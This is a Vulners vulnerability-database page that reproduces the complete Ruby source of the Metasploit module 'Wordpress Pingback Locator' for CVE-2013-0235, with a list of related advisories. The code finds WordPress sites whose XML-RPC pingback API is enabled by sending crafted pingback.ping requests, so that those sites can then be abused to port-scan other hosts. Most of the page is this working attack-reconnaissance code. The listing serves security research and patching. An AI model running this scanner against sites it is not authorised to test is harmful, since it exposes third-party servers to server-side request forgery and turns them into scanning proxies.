, Brandon McCann "zeknox" , Christian Mehlmauer ">
Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Wordpress Pingback Locator

🗓️ 05 Jan 2013 01:44:40Reported by Thomas McCarthy "smilingraccoon" <[email protected]>, Brandon McCann "zeknox" <[email protected]>, Christian Mehlmauer <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 71 Views

Wordpress Pingback Locator module scans for WordPress sites with enabled Pingback API. Attacker can cause sites to port scan an external target and return results. Fixed in WordPress 3.5.1

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		wordpress -- multiple vulnerabilities
24 Jan 201300:00
freebsd
Tenable Nessus		WordPress < 3.5.1 Multiple Vulnerabilities
26 Feb 201600:00
nessus
Tenable Nessus		Debian DSA-2718-1 : wordpress - several vulnerabilities
3 Jul 201300:00
nessus
Tenable Nessus		Fedora 17 : wordpress-3.5.1-1.fc17 (2013-1692)
11 Feb 201300:00
nessus
Tenable Nessus		Fedora 18 : wordpress-3.5.1-1.fc18 (2013-1774)
11 Feb 201300:00
nessus
Tenable Nessus		FreeBSD : wordpress -- multiple vulnerabilities (559e00b7-6a4d-11e2-b6b0-10bf48230856)
30 Jan 201300:00
nessus
Tenable Nessus		Mandriva Linux Security Advisory : wordpress (MDVSA-2013:189)
3 Jul 201300:00
nessus
Tenable Nessus		WordPress < 3.5.1 Multiple Vulnerabilities
4 Feb 201300:00
nessus
Tenable Nessus		WordPress 'xmlrpc.php' pingback.ping Server-Side Request Forgery
4 Feb 201300:00
nessus
Circl		CVE-2013-0235
29 May 201815:50
circl
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Wordpress Pingback Locator',
      'Description' => %q{
          This module will scan for wordpress sites with the Pingback
          API enabled. By interfacing with the API an attacker can cause
          the wordpress site to port scan an external target and return
          results. Refer to the wordpress_pingback_portscanner module.
          This issue was fixed in wordpress 3.5.1
        },
      'Author' =>
        [
          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>' ,
          'Christian Mehlmauer' # Original PoC
        ],
      'License' => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-0235' ],
          [ 'URL', 'https://bugtraq.securityfocus.com/archive/1/525045/30/30/threaded'],
          [ 'URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],
          [ 'URL', 'https://github.com/FireFart/WordpressPingbackPortScanner']
        ]
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, 'The path to wordpress installation (e.g. /wordpress/)', '/'])
        ])

      register_advanced_options(
        [
          OptInt.new('NUM_REDIRECTS', [ true, "Number of HTTP redirects to follow", 10])
        ])
  end

  def setup()
    # Check if database is active
    if db()
      @db_active = true
    else
      @db_active = false
    end
  end

  def get_xml_rpc_url(ip)
    # code to find the xmlrpc url when passed in IP
    vprint_status("#{ip} - Enumerating XML-RPC URI...")

    begin

      uri = target_uri.path
      uri << '/' if uri[-1,1] != '/'

      res = send_request_cgi(
      {
          'method'	=> 'HEAD',
          'uri'		=> "#{uri}"
      })
      # Check if X-Pingback exists and return value
      if res
        if res['X-Pingback']
          return res['X-Pingback']
        else
          vprint_status("#{ip} - X-Pingback header not found")
          return nil
        end
      else
        return nil
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("#{ip} - Unable to connect")
      return nil
    end
  end

  # Creates the XML data to be sent
  def generate_pingback_xml(target, valid_blog_post)
    xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
    xml << "<methodCall>"
    xml << "<methodName>pingback.ping</methodName>"
    xml << "<params>"
    xml << "<param><value><string>#{target}</string></value></param>"
    xml << "<param><value><string>#{valid_blog_post}</string></value></param>"
    xml << "</params>"
    xml << "</methodCall>"
    return xml
  end

  def get_blog_posts(xml_rpc, ip)
    # find all blog posts within IP and determine if pingback is enabled
    blog_posts = wordpress_get_all_blog_posts_via_feed(datastore['NUM_REDIRECTS'])
    blog_posts.each do |blog_post|
      pingback_response = get_pingback_request(xml_rpc, 'http://127.0.0.1', blog_post)
      if pingback_response
        pingback_disabled_match = pingback_response.body.match(/<value><int>33<\/int><\/value>/i)
        if pingback_response.code == 200 and pingback_disabled_match.nil?
          print_good("#{ip} - Pingback enabled: #{blog_post}")
          return blog_post
        else
          vprint_status("#{ip} - Pingback disabled: #{blog_post}")
        end
      end
    end

    return nil
  end

  # method to send xml-rpc requests
  def get_pingback_request(xml_rpc, target, blog_post)
    uri = xml_rpc.sub(/.*?#{target}/,"")
    # create xml pingback request
    pingback_xml = generate_pingback_xml(target, blog_post)

    # Send post request with crafted XML as data
    begin
      res = send_request_cgi({
        'uri'    => "#{uri}",
        'method' => 'POST',
        'data'	 => "#{pingback_xml}"
        })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("Unable to connect to #{uri}")
      return nil
    end
    return res
  end

  # Save data to vuln table
  def store_vuln(ip, blog)
    report_vuln(
      :host		=> ip,
      :proto		=> 'tcp',
      :port		=> datastore['RPORT'],
      :name		=> self.name,
      :info		=> "Module #{self.fullname} found pingback at #{blog}",
      :sname		=> datastore['SSL'] ? "https" : "http"
    )
  end

  # main control method
  def run_host(ip)
    unless wordpress_and_online?
      print_error("#{ip} does not seem to be Wordpress site")
      return
    end

    # call method to get xmlrpc url
    xmlrpc = get_xml_rpc_url(ip)

    # once xmlrpc url is found, get_blog_posts
    if xmlrpc.nil?
      print_error("#{ip} - It doesn't appear to be vulnerable")
    else
      hash = get_blog_posts(xmlrpc, ip)

      if hash
        store_vuln(ip, hash) if @db_active
      else
        print_status("#{ip} - X-Pingback enabled but no vulnerable blogs found")
      end
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2024 20:02Current
7.1High risk
Vulners AI Score7.1
CVSS 26.4
EPSS0.28857
wordpresspingbackapiport scanwordpress 3.5.1cve-2013-0235securityfocusxml-rpc api
71